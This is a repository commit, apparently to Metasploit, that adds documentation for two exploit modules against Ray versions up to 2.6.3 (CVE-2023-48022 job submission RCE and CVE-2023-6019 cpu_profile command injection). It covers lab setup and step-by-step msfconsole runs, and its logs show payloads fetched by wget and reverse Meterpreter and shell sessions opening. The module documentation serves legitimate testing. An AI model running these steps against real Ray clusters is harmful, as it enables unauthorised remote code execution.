Land #19363, Ray Modules CVE-2023-6019 CVE-2023-6020 CVE-2023-48022
This commit is contained in:
dledda-r7
@@ -0,0 +1,103 @@
|
||||
## Vulnerable Application
|
||||
|
||||
Ray (<=v2.6.3) is vulnerable to RCE via the agent job submission endpoint (CVE-2023-48022)
|
||||
|
||||
The vulnerability affects:
|
||||
|
||||
* Ray (<=v2.6.3)
|
||||
|
||||
This module was successfully tested on:
|
||||
|
||||
* Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15
|
||||
|
||||
### Install and run the vulnerable Ray (v2.6.3)
|
||||
|
||||
1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
|
||||
2. Install Kali Linux (or other Linux distro) in your virtualization engine.
|
||||
3. Pull pre-built Ray docker container (v2.6.3) in your VM.
|
||||
`docker pull rayproject/ray:2.6.3`
|
||||
4. Start the ray container.
|
||||
`docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
|
||||
5. Start ray.
|
||||
`ray start --head --dashboard-host=0.0.0.0`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/linux/http/ray_agent_job_rce`
|
||||
4. Do: `set rhost <rhost>`
|
||||
5. Do: `set lhost <attacker-ip>`
|
||||
6. Do: `run`
|
||||
7. You should get a shell or meterpreter
|
||||
|
||||
## Options
|
||||
No options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0)
|
||||
```
|
||||
msf6 > use exploit/linux/http/ray_agent_job_rce
|
||||
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6
|
||||
rhost => 192.168.56.6
|
||||
msf6 exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1
|
||||
lhost => 192.168.56.1
|
||||
msf6 exploit(linux/http/ray_agent_job_rce) > check
|
||||
[*] 192.168.56.6:8265 - The service is running, but could not be validated.
|
||||
msf6 exploit(linux/http/ray_agent_job_rce) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The service is running, but could not be validated.
|
||||
[+] Command execution successful. Job ID: 'raysubmit_EJDSK2BrhAP8j69n' Submission ID: 'raysubmit_EJDSK2BrhAP8j69n'
|
||||
[*] Using URL: http://192.168.56.1:8080/kOZWO5HA3wWm2Hh
|
||||
[*] Command Stager progress - 100.00% done (120/120 bytes)
|
||||
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /kOZWO5HA3wWm2Hh
|
||||
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
|
||||
[*] Sending stage (3045380 bytes) to 192.168.56.6
|
||||
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:42052) at 2024-08-10 10:45:48 +0900
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.17.0.2
|
||||
OS : Ubuntu 20.04 (Linux 6.6.15-amd64)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
```
|
||||
|
||||
### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1)
|
||||
```
|
||||
msf6 > use exploit/linux/http/ray_agent_job_rce
|
||||
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/ray_agent_job_rce) > set rhost 192.168.56.6
|
||||
rhost => 192.168.56.6
|
||||
msf6 exploit(linux/http/ray_agent_job_rce) > set lhost 192.168.56.1
|
||||
lhost => 192.168.56.1
|
||||
msf6 exploit(linux/http/ray_agent_job_rce) > set target 1
|
||||
target => 1
|
||||
msf6 exploit(linux/http/ray_agent_job_rce) > set payload linux/x86/shell/reverse_tcp
|
||||
payload => linux/x86/shell/reverse_tcp
|
||||
msf6 exploit(linux/http/ray_agent_job_rce) > check
|
||||
[*] 192.168.56.6:8265 - The service is running, but could not be validated.
|
||||
msf6 exploit(linux/http/ray_agent_job_rce) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The service is running, but could not be validated.
|
||||
[+] Command execution successful. Job ID: 'raysubmit_RNpiJJt2feNrUrwN' Submission ID: 'raysubmit_RNpiJJt2feNrUrwN'
|
||||
[*] Using URL: http://192.168.56.1:8080/QtpKXmqA8kq
|
||||
[*] Command Stager progress - 100.00% done (116/116 bytes)
|
||||
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /QtpKXmqA8kq
|
||||
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
|
||||
[*] Sending stage (36 bytes) to 192.168.56.6
|
||||
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:35136) at 2024-08-10 10:47:37 +0900
|
||||
[*] Server stopped.
|
||||
|
||||
whoami
|
||||
ray
|
||||
pwd
|
||||
/home/ray
|
||||
```
|
||||
+103
@@ -0,0 +1,103 @@
|
||||
## Vulnerable Application
|
||||
|
||||
Ray (<=v2.6.3) is vulnerable to RCE via cpu_profile command injection vulnerability (CVE-2023-6019)
|
||||
|
||||
The vulnerability affects:
|
||||
|
||||
* Ray (<=v2.6.3)
|
||||
|
||||
This module was successfully tested on:
|
||||
|
||||
* Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15
|
||||
|
||||
### Install and run the vulnerable Ray (v2.6.3)
|
||||
|
||||
1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform.
|
||||
2. Install Kali Linux (or other Linux distro) in your virtualization engine.
|
||||
3. Pull pre-built Ray docker container (v2.6.3) in your VM.
|
||||
`docker pull rayproject/ray:2.6.3`
|
||||
4. Start the ray container.
|
||||
`docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3`
|
||||
5. Start ray.
|
||||
`ray start --head --dashboard-host=0.0.0.0`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019`
|
||||
4. Do: `set rhost <rhost>`
|
||||
5. Do: `set lhost <attacker-ip>`
|
||||
6. Do: `run`
|
||||
7. You should get a shell or meterpreter
|
||||
|
||||
## Options
|
||||
No options
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 0)
|
||||
```
|
||||
msf6 > use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019
|
||||
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set rhost 192.168.56.6
|
||||
rhost => 192.168.56.6
|
||||
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set lhost 192.168.56.1
|
||||
lhost => 192.168.56.1
|
||||
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > check
|
||||
[*] 192.168.56.6:8265 - The service is running, but could not be validated.
|
||||
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The service is running, but could not be validated.
|
||||
[+] Grabbed node info, pid: 129, ip: 172.17.0.2
|
||||
[*] Using URL: http://192.168.56.1:8080/2W4ZJ30NqjnfoGE
|
||||
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /2W4ZJ30NqjnfoGE
|
||||
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
|
||||
[*] Sending stage (3045380 bytes) to 192.168.56.6
|
||||
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:59072) at 2024-08-10 10:29:05 +0900
|
||||
[*] Command Stager progress - 100.00% done (120/120 bytes)
|
||||
[*] Server stopped.
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.17.0.2
|
||||
OS : Ubuntu 20.04 (Linux 6.6.15-amd64)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
```
|
||||
|
||||
### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (target 1)
|
||||
```
|
||||
msf6 > use exploit/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019
|
||||
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set rhost 192.168.56.6
|
||||
rhost => 192.168.56.6
|
||||
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set lhost 192.168.56.1
|
||||
lhost => 192.168.56.1
|
||||
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set target 1
|
||||
target => 1
|
||||
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > set payload linux/x86/shell/reverse_tcp
|
||||
payload => linux/x86/shell/reverse_tcp
|
||||
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > check
|
||||
[*] 192.168.56.6:8265 - The service is running, but could not be validated.
|
||||
msf6 exploit(linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The service is running, but could not be validated.
|
||||
[+] Grabbed node info, pid: 129, ip: 172.17.0.2
|
||||
[*] Using URL: http://192.168.56.1:8080/Mz2SC2mlSp
|
||||
[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /Mz2SC2mlSp
|
||||
[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu))
|
||||
[*] Sending stage (36 bytes) to 192.168.56.6
|
||||
[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:59210) at 2024-08-10 10:30:49 +0900
|
||||
[*] Command Stager progress - 100.00% done (115/115 bytes)
|
||||
[*] Server stopped.
|
||||
|
||||
whoami
|
||||
ray
|
||||
pwd
|
||||
/home/ray
|
||||
```
|
||||
Reference in New Issue
Block a user